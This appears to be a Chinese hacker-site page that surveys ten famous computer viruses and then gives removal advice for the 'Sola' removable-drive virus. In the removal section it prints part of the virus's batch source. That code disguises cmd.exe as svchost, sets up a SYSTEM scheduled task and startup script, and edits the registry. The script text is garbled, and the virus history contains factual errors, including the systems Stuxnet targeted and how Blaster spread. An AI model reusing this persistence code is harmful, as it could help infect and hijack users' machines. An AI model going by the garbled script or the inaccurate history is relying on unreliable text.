黑客技术群

黑客入侵,黑客基地,黑客组织,网站黑客,黑客平台

宅男木马病毒(高清木马无病毒)

本文导读目录:

中国十大网络病毒是什么

1.代号:爬行者Creeper

感染系统:ARPANET大型机

发现时间:1971年

传播方式:就是不断自我复制。

杀伤力:不断膨胀,将硬盘塞满

什么情况:

爬行者可能是人类所知的第一个病毒类程序,或者这个程序基本上都称不上是病毒程序,更确切的来说,它就是一段恶意代码。病毒的作者是马萨诸塞州剑桥市一个企业的员工Bob Thomas ,此人曾参与了互联网前身“阿帕网”的搭建工作。该程序的出现要归因于实验室的一次测试,测试的目的是要了解是否能创造出一种可自我复制的软件。这个会不断自我复制,并能够在最早的互联网中进行远程复制的病毒并没有造成什么危害,但是它的诞生却开启了数字时代整整四十年的噩梦,而且至今挥之不去。

2.代号:MyDoom

感染系统:Windows 98/2000/XP

发现时间:2004年1月

传播方式:电子邮件。

杀伤力:MyDoom是迄今为止造成经济损失最大的病毒,385亿美元是它肆虐后的代价。当然它也荣登史上传播速度最快的病毒。

什么情况:

在MyDoom发作的那几天,全球至少有三分之一的电脑无法联网,因为网速实在太慢了。MyDoom用仅一周的时间就感染了全球超过千万台电脑,2004年的2月份,对于刚刚遭遇过寒冬的IT行业来说,那个月更让人颤栗的是,全球每12封电子邮件中就至少有1封是带着MyDoom病毒的邮件。

MyDoom第一个变种发作时通过发送大量的伪造攻击邮件,导致了SCO公司网站和邮件系统全面谈话。有人猜测原因大概与SCO想对Linux收取授权费用有关,随后MyDoom的第二个变种又将目标瞄向了微软公司。不过由于微软的储备有足够多的人才,这次攻击最终被微软化解掉,但是仍有人抱怨那段时间访问微软网站速度很慢,其实或许不是访问微软速度很慢,而是在MyDoom的肆虐下,全球都很慢。

微软和SCO事后声称,如果有人能够告诉他们谁是MyDoom的作者,他们将分别奖励线人25万美金。不过FBI和CIA折腾了一番之后都无功而返,就像所有老套的资本主义笑话一样,他们声称病毒制作者在俄罗斯。

3.代号:CIH

感染系统:Windows 95/98

发现时间:1998年9月

传播方式:从正版到盗版各种EXE文件。

杀伤力:不夸张的说,CIH以其惊人的破坏能力和感染速度,着实教育了当时使用盗版成风的国人,至少很多人都醒悟到要买套正版杀毒软件,最终它造成全球5亿美元的损失,同时也带动了国内数以亿计的杀毒市场。

什么情况:

你的硬盘是不是在狂转?电脑开机一片黑屏?被CIH感染的计算机的硬盘会狂转,随后所有的电脑中的EXE程序均会遭到破坏与病毒感染,成为新的感染源。接下来CIH会在硬盘主引导区中依次写垃圾数据,直至硬盘的数据全部被破坏彻底为止,

让你想恢复数据都无从入手。最终的必杀手段是将电脑主板的BIOS信息全部清除,让你的电脑彻底瘫痪。

CIH病毒的作者是中国台湾的陈盈豪,在CIH病毒成为一夜成名之后,台湾军方也注意到陈盈豪,想将他调入台湾电子战特种部队,可惜在经过一番体检之后,台湾军方医生认为陈盈豪患有“轻度抑郁症”,不仅没有将他调入台湾电子战特种部队,反而责令他提前退役。现如今回看当年,陈盈豪被医生描述为轻度抑郁症的病症表现只不过是所有网络宅男的标准特征。

如今陈盈豪在硬件知名厂商技嘉公司工作,有意思的是当年CIH爆发后让许多电脑用户人心惶惶,生怕被CIH烧毁了主板BIOS无法挽救,而这是技嘉公司看准了这个噱头,生产了双CMOS主板狠赚了一笔。而在中国内地,CIH病毒也改写了国内杀毒软件的格局,救活了原来并不出名的瑞星。微软应该是CIH病毒事件中最郁闷的厂商,Windows 98刚刚发布不久,就被证明了存在一系列重大设计缺陷,让许多Linux支持者找到了口实。

4.代号:熊猫烧香

感染系统:Windows XP

发现时间:2006年10月16日

传播方式:端口攻击和恶意脚本。

杀伤力:国内至少有100万台电脑受到感染。

什么情况:

电脑所有可执行文件的图标全部变成一只举着三只香的胖胖的熊猫,而且所有的可执行文件都无法执行。当你试图通过Ghost还原的时候,会发现硬盘中的GHO磁盘镜像文件也被病毒删除了。立刻杀毒?抱歉,绝大多数你能够想得起来的杀毒软件都会被病毒强行终止进程。熊猫烧香还仿照冲击波等病毒的特点,通过Windows系统共享漏洞和用户弱口令攻击感染局域网内的电脑,并同时释放Autorun.inf感染U盘和移动硬盘。

最后连HTML等网页格式文件它也没有放过,熊猫烧香病毒一旦发现网页文件,就会通过iframe标记将病毒代码插入到网页中。而许多网站维护人员会误将这些带毒网页上传到网站中,造成更大范围的感染。其实熊猫烧香病毒是一个没有太多新技术的病毒,只不过病毒作者将之前N种病毒传播特点都集中在了这一个病毒上,等于将鹤顶红、敌敌畏、氰化物、砒霜和三聚氰胺等几十种毒药混在了一起,自然吃上一口就口吐白沫了。

最绝的是,病毒作者李俊将这个病毒分别买个了120个小黑客,鼓励教导他们广撒网多抓鸡。李俊自己也购买了服务器,专门用作病毒更新,创下了一天更新8次的病毒升级记录,可以堪称史上最勤奋的病毒作者。当然,这么勤劳最终的结果自然是被抓判刑。

5.代号:I Love You 又名 爱虫

感染系统:Windows 系统

发现时间:2000年5月30日

传播方式:电子邮件。

杀伤力:4500万台电脑遭受感染。

什么情况:

在那个互联网刚刚呈现第一股热潮的时代,那个没有Facebook没有Twitter只能够用Email沟通的时代。当某一天早晨,你收到了一封写有“I Love You ”标题的电子邮件你会点开吗?在2000年的那个六一儿童节的前一天,许多寂寞的互联网Geek和宅男都点开了这样一封邮件。从此,史上感染力最强的病毒诞生了。爱虫病毒总共感染了4500万电脑,比第二名红色代码足足多出100多倍。

6.代号:冲击波

感染系统:Windows 系统

发现时间:2003年8月

传播方式:电子邮件。

杀伤力:全球80%的Windows系统遭受攻击

什么情况:

电脑突然弹框告诉你还有59秒它就要自动重启了,没有什么原因,也没有什么理由,随后就是一遍又一遍的重启。而内网中很快也会出现其它和你同病相怜的电脑,很快就如同流行性感冒一样,重启电脑随处可以见。随后未中毒的计算机也会出现访问网络速度减慢的情况。当高手们告诉你中毒了的时候,并且告诉你需要修补某个Windows补丁时,你却发现你无法打上这个补丁了,这就是曾经肆虐互联网的冲击波病毒。

冲击波病毒虽然不是第一个利用Windows漏洞传播的病毒,但是确实第一个造成大面积危害的。特别是中国国内许多用户的Windows并非正版,因此不能够使用微软提供的Windows Update服务,导致了病毒灾情的加剧,事后微软更改了自己的补丁修补策略,盖茨为此开出了50万美金的悬赏。而联邦调查局也的确抓住了一个制作冲击波病毒变种的倒霉蛋,18岁的Jeffrey Lee Parson,不过他只是一个变种作者,并非冲击波的原作者。

7.代号:Melissa梅丽莎 又名辛普森一家

感染系统:Windows系统下的Outlook

发现时间:1999年3月26日

传播方式:电子邮件。

杀伤力:雅虎、美国在线、微软、朗讯、英特尔和美国多所知名大学网站的服务器,均因为Melissa病毒泛滥而瘫痪。

什么情况:

在1999年3月访问过成人新闻组并下载过一个Word文档的用户都没有留意到,自己的Outlook电子邮件程序开始悄悄地自动给自己地址簿里的好友发送电子邮件了。而且每一封电子邮件都带着一个名为List.doc的带毒文件。这可能是网络社会化六度关系SNS最早证明自己是真理的地方。随着受害者的好友、好友的好友和好友的好友的好友不断的叠加感染,最终梅丽莎病毒造成了互联网的大瘫痪。

而梅丽莎病毒的亲爹大卫史密斯开发这个病毒的原因竟然是爱上了一个迈阿密的脱衣舞女,他为她着迷,并最终用这个脱衣舞女的名字命名了自己的病毒。他自己最终被判刑20个月。

8.代号:尼姆达

感染系统:Windows 所有32位系统

发现时间:2001年9月18日

传播方式:FTP、电子邮件、IM软件、网页。

杀伤力:造成3.7亿元经济损失

什么情况:

虽然很多人躲过了红色代码的攻击,但那一年绝大多数用户没有逃过尼姆达的攻击,而原因仅在于红色代码只攻击服务器系统,而尼姆达则感染所有32位Windows系统,从Windows 95到当时最新的Windows 2000,统统不放过。

而尼姆达病毒当时的感染方式也非常多样,它可以通过文件感染、电子邮件传播、系统漏洞、网页传播四种方式进行传播。虽然后来的熊猫烧香病毒的感染手段超越了尼姆达,但是就病毒感染途径的多样化而言,尼姆达当时的确是最具与杀伤力的病毒。

9.代号:灰鸽子

感染系统:Windows 系统

发现时间:2001年

传播方式:多种网络传播方式

杀伤力:灰鸽子

什么情况:

中了灰鸽子会出现什么情况?事实是什么情况都会出现。灰鸽子能够记录你的键盘击键记录,能够远程开启摄像头,打开麦克风,能够下载你电脑里的任何文件。几乎你能够想到的电脑本机操作,黑客都可以通过灰鸽子远程控制实现。从灰鸽子诞生的2001年到销声匿迹的2008年之间,正好遭遇了全民皆黑客的年代,灰鸽子因为操作简单,上手快,很快的成为当时最泛滥的木马病毒,近中国国内至少有上千万台电脑感染过灰鸽子病毒。

有趣的是,灰鸽子的作者最后并没有像熊猫烧香的李俊一样,一直用灰鸽子赚钱。在2008年之后该作者转而开发防火墙,专门用来防护自己的灰鸽子。

10.代号:Stuxnet蠕虫 超级工厂病毒

感染系统:Windows CE系统

发现时间:2010年6月

传播方式:U盘

杀伤力:导致伊朗布什尔核电站瘫痪。

什么情况:

2010年7月份,全球几大杀毒软件厂商突然开始分析一个名为Stuxnet的病毒,这个病毒的独特之处在于,它并不攻击传统的Windows系统,而是将目标放在了极小众、极专业的西门子Win CC工控系统上,这个系统的原型就是广为人熟知的Windows CE。随后安全研究员发现,该病毒针对目标非常具体,它会通过U盘感染将自己摆渡到目标工控机中,然后发作。

吊诡的是,第一批发作的Stuxnet蠕虫的60%都将目标定在了伊朗布什尔核电站的西门子工控系统上,这个核电站正是美国怀疑伊朗制造核武器的基地。美国国家网络安全与通讯整合中心主管迈格克指出,属木马程序的Stuxnet一旦找到西门子WinCC装置,就能接管西门子设施的关键操作系统,并在十分之一秒里“封住”设备的操作。而有关安全组织也认为,制造Stuxnet的团体应资金充裕,成员约5到10人,耗费半年筹备。

不过Stuxnet最终不仅开始攻击伊朗核电站,它甚至开始接二连三的变种,开始攻击全球的西门子工控系统,连美国自己也成为了受害的倒霉蛋之一。

我不小心下载了宅男影院不知道是什么就点进去结果说要每个月扣我二十

这种是木马病毒,下个360就行了,我以前也遇到过,如果你经常浏览那种网站建议安装一个360,不然很容易中病毒

怎么解决宅男病毒(sola病毒)?

解决方法二:

一、进安全模式

1.同样用“资源管理器”进入各盘符目录下,删除隐藏的“SOLA”文件夹和“Autorun.inf”文件

然后去360网站上下载一个“U盘病毒专杀工具”查杀完后弹出窗口“是否……”点击“是”,然后会询问“是否创建XXX”

点击创建,该软件就会在各个盘符下创建一个名问“Autorun.inf”的假病毒文件,这样就能防止病毒再创建此文件。

2.“搜索文件或文件夹”关键字“sola”的所有文件和文件夹,删除所有有关sola这个名字的文件和文件夹。

3.可手动找到并删除下列文件。

%systemroot%\\Fonts\\Regedit.reg

%systemroot%\\Fonts\\sleep.exe

%systemroot%\\Fonts\\SOLA.BAT

%systemroot%\\Fonts\\est_type2032.fon

%systemroot%\\Tasks\\Tasks.job

%systemroot%\\Fonts\\solasetup

%systemroot%\\Tasks\\Tasks.job

4.按创建时间排序,删除所有和其同一时间创建的文件。

5.打开注册表(点击“开始”——“运行”,输入“regedit”,回车)

6.鼠标点选注册表左边目录最上方“我的电脑”,然后点击“编辑”——“查找”,输入“SOLA”删除所有相关的“项”“值”“数据”

注:有些软件的名字中带有“SOLA”,但并不是病毒,要区分开来。(如下图所示就不属于病毒项)病毒的“项”“值”“数据”一般一眼就能看出。

[attach]27266[/attach]

-----------------------

7.木马为了能够在开机后自动运行,往往在注册表如下选项中添加注册表项:

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnceEx

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices

HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce

删除不明项。(也可用360安全卫士查看启动项)

在“C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动”中有一个SOLA.vbs文件

(注:这里我记得不太清楚了,因为我忘了保存该文件的样本)

8.最后再检查一下所有盘符,看看“SOLA”文件夹是否删除干净,如还存在需再删一次,“Autorun.inf”文件就不需要删除了,那是专杀工具创建用来欺骗病毒的文件。

9.删除你的U盘、MP3等一切USB接口硬件中的“SOLA”文件夹;当然用手机内存读卡器的也会中标。

10.重启电脑,搞定。

下面附上“sola.bat”中的内容:

@echo off

set sola=%systemroot%\\Fonts

set setup=%systemroot%\\Fonts\\solasetup

if not \"%1\"==\"-USB\" goto Start

start /max ..

if exist %sola%\\SOLA.BAT goto End

::========================Infect==============================

:Infect

cd\\

md %systemroot%\\Fonts\\solasetup

::————文件复制---------

copy sola\\Autorun.inf %setup%\\Autorun.inf

copy sola\\SOLA.BAT %setup%\\SOLA.BAT

copy sola\\宅男请进.RAR %setup%\\宅男请进.RAR

copy sola\\Tasks.xxx %setup%\\Tasks.xxx

copy sola\\sleep.exe %setup%\\sleep.exe

tasklist %sola%\\task.txt

FOR /F \"tokens=1\" %%i in (\'findstr /I \"svchost.exe\" \"%sola%\\task.txt\"\') do set svchost=%%i

copy %systemroot%\\system32\\cmd.exe %sola%\\%svchost%

del %sola%\\task.txt

:Tasks

copy %setup%\\Tasks.xxx %systemroot%\\Tasks\\Tasks.job

schtasks /change /ru \"NT AUTHORITY\\SYSTEM\" /tn \"Tasks\" if errorlevel 1 goto TaskFail

goto TaskSuc

:TaskFail

%homedrive%

cd \"%ALLUSERSPROFILE%\"

cd 「开始」菜单\\程序\\启动

echo On Error Resume NextSOLA.VBS

echo set ws=wscript.createobject(\"wscript.shell\")SOLA.VBS

echo ws.run \"%sola%\\svchost.exe /c %sola%\\SOLA.BAT\",0 SOLA.VBS

copy SOLA.VBS %sola%\\SOLA.VBS

echo NT%systemroot%\\Fonts\\NoTasks

:TaskSuc

attrib %systemroot%\\Tasks\\Tasks.job +s +h +r

copy %setup%\\sola.bat %sola%\\sola.bat

copy %setup%\\sleep.exe %systemroot%\\system32\\sleep.exe

:NoAutoPlay

net stop \"Shell Hardware Detection\"

echo Windows Registry Editor Version 5.00%systemroot%\\Fonts\\Regedit.reg

echo [HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\ShellHWDetection]%systemroot%\\Fonts\\Regedit.reg

echo \"Start\"=dword:00000004%systemroot%\\Fonts\\Regedit.reg

start regedit /s %systemroot%\\Fonts\\Regedit.reg

:KillTMG

goto End

::======================Infect======================================

::======================Start=======================================

:Start

%homedrive%

cd \"%ALLUSERSPROFILE%\"

cd 「开始」菜单\\程序\\启动

date /t %sola%\\est_type2032.fon

findstr /c:\"-10-01\" \"%sola%\\est_type2032.fon\" if not errorlevel 1 goto DayOn

if exist %systemroot%\\Fonts\\NoTasks if not exist SOLA.VBS copy %sola%\\SOLA.VBS SOLA.VBS

:Continue

sleep 300set C=0 echo 1C:\\solachk1 findstr . C:\\solachk1 if not errorlevel 1 del C:\\solachk1 sleep 1000set C=1 findstr /C:\"SOLA_1.0\" C:\\Autorun.inf if errorlevel 1 attrib -s -h -r C:\\Autorun.inf

如何彻底清除“宅男病毒”

如果你中了“死亡问答”(Sola)宅男病毒,用杀毒软件只能查出病毒,但无法恢复被感染图片文件。目前唯一能恢复图片的解决方案,是使用贝壳的《“死亡问答”(Sola)宅男病毒专杀工具》。

《“死亡问答”(Sola)宅男病毒专杀工具》能彻底查杀“死亡问答”(Sola)宅男病毒,恢复被感染文件。请您立即下载专杀工具,检测系统是否已经感染该病毒。

“死亡问答”(Sola)宅男病毒危害性

病毒会感染用户近期打开过的DOC,TXT,JPG文件,使之全部变成EXE文件。在病毒执行次数累计超过50的时候,死亡问答便会被激活,同时锁定系统,删除NTLDR(全称是NT Loader,是系统加载程序)。若用户回答问题正确,病毒恢复NTLDR,并且进入自我清除模式。若用户回答失败,则需重装系统。

手机自动安装了宅男直播是木马病毒吗?

流氓软件直接卸载吧,有360或者腾讯管家的话杀杀毒,没有就下吧

宅男影院有病毒?

很多都是有木马的,很多都是收费的估计是有的,这类1看就知道是非正规的不要乱点广告会好点

关于sola病毒(宅男病毒),急求救!!!

应该是被杀毒软件自动清除了吧,如果病毒文件还在,就用它自带的杀吧。。 sola文件夹里面有两个东西functio.dll和 sola.bat 在function.dll点右键打开方式里

面找winrar 解压出来之后里面有个SolaKiller.rar 把他解压密码kakenhi200601

在里面有个Install.bat 双击运行,然后在开始菜单里面程序里就多了个“SOLA病毒专杀”

运行里面的SolaKiller.bat 吧。

如果还不行,进入安全模式启动杀毒软件杀毒,并手动删除病毒文件

  • 评论列表:
  •  泪灼颇倔
     发布于 2022-07-02 02:57:18  回复该评论
  • 是一个没有太多新技术的病毒,只不过病毒作者将之前N种病毒传播特点都集中在了这一个病毒上,等于将鹤顶红、敌敌畏、氰化物、砒霜和三聚氰胺等几十种毒药混在了一起,自然吃上一口就口吐白沫了。最绝的是,病毒作者李俊将这个病毒分别买个了120个小黑客,鼓励教导他们广撒网多抓鸡。李俊自己也
  •  竹祭疚爱
     发布于 2022-07-02 05:58:54  回复该评论
  • 旦发现网页文件,就会通过iframe标记将病毒代码插入到网页中。而许多网站维护人员会误将这些带毒网页上传到网站中,造成更大范围的感染。其实熊猫烧香病毒是一个没有太多新技术的病毒,只不过病毒作者将之前N种病毒传播
  •  鸽吻十鸦
     发布于 2022-07-02 08:56:05  回复该评论
  • 件它也没有放过,熊猫烧香病毒一旦发现网页文件,就会通过iframe标记将病毒代码插入到网页中。而许多网站维护人员会误将这些带毒网页上传到网站中,造成更大范围的感染。其实熊猫烧香病毒是一个没有太多新技术的病毒,只不过病毒作者将之前N种病毒传播特点都集中在了这一个病毒

发表评论:

Powered By

Copyright Your WebSite.Some Rights Reserved.